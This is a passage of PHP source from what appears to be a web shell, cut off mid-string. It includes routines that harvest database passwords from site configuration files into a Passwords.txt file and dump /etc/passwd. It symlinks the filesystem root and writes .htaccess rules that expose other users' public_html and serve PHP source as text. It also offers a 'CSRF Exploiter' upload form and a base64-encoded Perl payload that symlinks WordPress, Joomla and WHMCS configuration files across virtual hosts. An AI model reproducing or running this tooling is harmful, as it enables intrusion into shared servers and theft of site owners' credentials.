  1734. $db=entre2v2($uxl,"dbpass = '","';");
  1735. if(!empty($db))
  1736. $pass=$db."\n";
  1737. fwrite($ffile,$pass);
  1738. }
  1739. elseif($uxl && preg_match('/dbpass/i',$uxl))
  1740. {
  1741.  
  1742. //Other
  1743.  
  1744. $db=entre2v2($uxl,"dbpass = '","';");
  1745. if(!empty($db))
  1746. $pass=$db."\n";
  1747. fwrite($ffile,$pass);
  1748.  
  1749. }
  1750. elseif($uxl && preg_match('/dbpass/i',$uxl))
  1751. {
  1752.  
  1753. //Other
  1754.  
  1755. $db=entre2v2($uxl,"dbpass = \"","\";");
  1756. if(!empty($db))
  1757. $pass=$db."\n";
  1758. fwrite($ffile,$pass);
  1759. }
  1760.  
  1761.  
  1762. }
  1763. }
  1764. echo "<center>
  1765. <a href=\"human_symconf/root/\">Root Server</a>
  1766. <br><a href=\"human_symconf/Passwords.txt\">Passwords</a>
  1767. <br><a href=\"human_symconf/\">Configurations</a></center>";
  1768. }
  1769. else
  1770. {
  1771. echo "<center>
  1772. <form method=\"POST\">
  1773. <textarea name=\"passwd\" class='area' rows='15' cols='60'>";
  1774. $file = '/etc/passwd';
  1775. $read = @fopen($file, 'r');
  1776. if ($read){
  1777. $body = @fread($read, @filesize($file));
  1778. echo "".htmlentities($body)."";
  1779. }
  1780. elseif(!$read)
  1781. {
  1782. $read = @show_source($file) ;
  1783. }
  1784. elseif(!$read)
  1785. {
  1786. $read = @highlight_file($file);
  1787. }
  1788. elseif(!$read)
  1789. {
  1790. for($uid=0;$uid<1000;$uid++)
  1791. {
  1792. $ara = posix_getpwuid($uid);
  1793. if (!empty($ara))
  1794. {
  1795. while (list ($key, $val) = each($ara))
  1796. {
  1797. print "$val:";
  1798. }
  1799. print "\n";
  1800. }}}
  1801.  
  1802. flush();
  1803.  
  1804. echo "</textarea>
  1805. <p><input name=\"m\" size=\"80\" value=\"Start\" type=\"submit\"/></p>
  1806. </form></center>";
  1807. }
  1808. }
  1809. }
  1810. elseif($_GET['do'] == 'symlink') {
  1811. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1812. $d0mains = @file("/etc/named.conf");
  1813. ##httaces
  1814. if($d0mains){
  1815. @mkdir("human_sym",0777);
  1816. @chdir("human_sym");
  1817. @exe("ln -s / root");
  1818. $file3 = 'Options Indexes FollowSymLinks
  1819. DirectoryIndex z.htm
  1820. AddType text/plain .php
  1821. AddHandler text/plain .php
  1822. Satisfy Any';
  1823. $fp3 = fopen('.htaccess','w');
  1824. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  1825. echo "
  1826. <table align=center border=1 style='width:80%;border-color:lime;'>
  1827. <tr>
  1828. <td align=center><font size=2>S. No.</font></td>
  1829. <td align=center><font size=2>Domains</font></td>
  1830. <td align=center><font size=2>Users</font></td>
  1831. <td align=center><font size=2>Symlink</font></td>
  1832. </tr>";
  1833. $dcount = 1;
  1834. foreach($d0mains as $d0main){
  1835. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  1836. flush();
  1837. if(strlen(trim($domains[1][0])) > 2){
  1838. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  1839. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  1840. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  1841. <td>".$user['name']."</td>
  1842. <td><a href='$full/human_sym/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  1843. flush();
  1844. $dcount++;}}}
  1845. echo "</table>";
  1846. }else{
  1847. $TEST=@file('/etc/passwd');
  1848. if ($TEST){
  1849. @mkdir("human_sym",0777);
  1850. @chdir("human_sym");
  1851. exe("ln -s / root");
  1852. $file3 = 'Options Indexes FollowSymLinks
  1853. DirectoryIndex z.htm
  1854. AddType text/plain .php
  1855. AddHandler text/plain .php
  1856. Satisfy Any';
  1857.  $fp3 = fopen('.htaccess','w');
  1858.  $fw3 = fwrite($fp3,$file3);
  1859.  @fclose($fp3);
  1860.  echo "
  1861. <table align=center border=1><tr>
  1862. <td align=center><font size=3>S. No.</font></td>
  1863. <td align=center><font size=3>Users</font></td>
  1864. <td align=center><font size=3>Symlink</font></td></tr>";
  1865.  $dcount = 1;
  1866.  $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  1867.  while(!feof($file)){
  1868.  $s = fgets($file);
  1869.  $matches = array();
  1870.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  1871.  $matches = str_replace("home/","",$matches[1]);
  1872.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  1873.  continue;
  1874.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  1875. <td align=center><font class=txt>" . $matches . "</td>";
  1876.  echo "<td align=center><font class=txt><a href=$full/human_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  1877.  $dcount++;}fclose($file);
  1878.  echo "</table>";}else{if($os != "Windows"){@mkdir("human_sym",0777);@chdir("human_sym");@exe("ln -s / root");$file3 = '
  1879. Options Indexes FollowSymLinks
  1880. DirectoryIndex z.htm
  1881. AddType text/plain .php
  1882. AddHandler text/plain .php
  1883. Satisfy Any
  1884. ';
  1885.  $fp3 = fopen('.htaccess','w');
  1886.  $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  1887.  echo "
  1888. <div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>Human Symlink</div>
  1889. <div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>
  1890. <table class='human' align=center border=1><tr>
  1891. <td align=center><font size=4>ID</font></td>
  1892. <td align=center><font size=4>Users</font></td>
  1893. <td align=center><font size=4>Symlink</font></td></tr>";
  1894.  $temp = "";$val1 = 0;$val2 = 1000;
  1895.  for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  1896.  if ($uid)$temp .= join(':',$uid)."\n";}
  1897.  echo '<br/>';$temp = trim($temp);$file5 =
  1898.  fopen("test.txt","w");
  1899.  fputs($file5,$temp);
  1900.  fclose($file5);$dcount = 1;$file =
  1901.  fopen("test.txt", "r") or exit("Unable to open file!");
  1902.  while(!feof($file)){$s = fgets($file);$matches = array();
  1903.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  1904.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  1905.  continue;
  1906.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  1907. <td align=center><font class=txt>" . $matches . "</td>";
  1908.   echo "<td align=center><font class=txt><a href=$full/human_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  1909.  $dcount++;}
  1910.  fclose($file);
  1911.  echo "</table></div></center>";unlink("test.txt");
  1912.  } else
  1913.  echo "<center><font size=3>Cannot create Symlink</font></center>";
  1914.  }
  1915.  }    
  1916. }
  1917. elseif($_GET['do'] == 'csrf') {
  1918.     echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'> [+] CSRF Exploiter Online [+]</div>";
  1919.     echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  1920.     echo "<center>
  1921.    <form method='post'>
  1922. URL: &nbsp&nbsp&nbsp&nbsp&nbsp&nbsp<input type='text' style='border:0;border-bottom:1px solid #292929; width:500px;' name='url' size='50' height='10' placeholder='http://127.0.0.1/[path]/upload.php' style='margin: 5px auto; padding-left: 5px;' required><br>
  1923. POST File: <input type='text' name='data' style='border:0;border-bottom:1px solid #292929; width:500px;' size='50' height='10' placeholder='Filedata / files[] / qqfile / userfile / dll' style='margin: 5px auto; padding-left: 5px;' required><br>
  1924. <br><input style='width: 50px; height: 30px; border-color=white;margin:10px 2px 0 2px;' class='kotak' type='submit' name='go' value='Lock!'>
  1925. </form></table>";
  1926. $url = $_POST['url'];
  1927. $data = $_POST['data'];
  1928. $submit = $_POST['go'];
  1929. if($submit) {
  1930.     echo "<br><form style='text-align:left' method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$data'><input style='width: 50px; height: 30px; border-color=white;margin:10px 2px 0 2px;' type='submit' name='ok' class='kotak' value='Upload'>
  1931.    </form></div>";
  1932. }
  1933.     ;} elseif($_GET['do'] == 'config') {
  1934.     $human = mkdir("human_config", 0777);
  1935.     $isi_htc = "Options FollowSymLinks MultiViews Indexes ExecCGI\nRequire None\nSatisfy Any\nAddType application/x-httpd-cgi .cin\nAddHandler cgi-script .cin\nAddHandler cgi-script .cin";
  1936.     $htc = fopen("human_config/.htaccess","w");
  1937.     fwrite($htc, $isi_htc);
  1938.     fclose($htc);
  1939.     if(preg_match("/vhosts|vhost/", $dir)) {
  1940.         $link_config = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1941.         $vhost = "IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpvcGVuZGlyKG15ICRkaXIgLCAiL3Zhci93d3cvdmhvc3RzLyIpOw0KZm9yZWFjaChzb3J0IHJlYWRkaXIgJGRpcikgew0KICAgIG15ICRpc0RpciA9IDA7DQogICAgJGlzRGlyID0gMSBpZiAtZCAkXzsNCiRzaXRlc3MgPSAkXzsNCg0KDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3Atb3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb20vaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zY29tbWVyY2UvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2UudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb21tZXJjZXMvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2VzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3BwaW5nL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXNob3BwaW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NhbGUvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNhbGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJHNpdGVzcy4nLWFtZW1iZXIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnLmluYy5waHAnLCRzaXRlc3MuJy1hbWVtYmVyMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXJzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictbWVtYmVycy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlczEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLWZvcnVtLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtcy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictZm9ydW1zLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FkbWluL2NvbmYucGhwJywkc2l0ZXNzLictNS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictNC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dwL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvV1Avd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ByZXNzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLXByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Jsb2cvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93b3JkcHJlc3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1uZXdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ldy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLW5ldy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9nL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmxvZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmV0YS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9ncy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLWJsb2dzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1ob21lLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Byb3RhbC93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3Mtc2l0ZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYWluL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtbWFpbi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy90ZXN0L3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtdGVzdC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcmNhZGUvZnVuY3Rpb25zL2RiY2xhc3MucGhwJywkc2l0ZXNzLictaWJwcm9hcmNhZGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJjYWRlL2Z1bmN0aW9ucy9kYmNsYXNzLnBocCcsJHNpdGVzcy4nLWlicHJvYXJjYWRlLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2pvb21sYS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYTIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9qb28vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb28udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY21zL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLWNtcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXNpdGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1tYWluLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtaG9tZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy92Yi9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmJ+Y29uZmlnLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiMy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIzfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jYy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIxfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bS9pbmNsdWRlcy9jbGFzc19jb3JlLnBocCcsJHNpdGVzcy4nLXZibHV0dGlufmNsYXNzX2NvcmUucGhwLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAxLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NjL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobTE1LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NlbnRyYWwvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tY2VudHJhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0td2htY3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htL1dITUNTL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLVdITUNTLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobWMvV0hNL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htYy1XSE0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG1jcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcG9ydC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zZWN1cmUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1zdWN1cmUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1Y3VyZS13aG0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VjdXJlLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NwYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNwYW5lbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9wYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXBhbmVsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3QvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VibWl0dGlja2V0LnBocCcsJHNpdGVzcy4nLXdobWNzMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50ZXMvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudHN1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRzdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5nLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYW5hZ2UvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tbWFuYWdlLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9teS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1teS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLW15c2hvcC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHM